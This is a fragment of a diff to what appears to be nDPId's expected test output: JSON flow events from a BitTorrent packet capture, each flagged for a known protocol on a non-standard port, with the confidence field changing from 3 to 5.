-00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7580000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7580000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
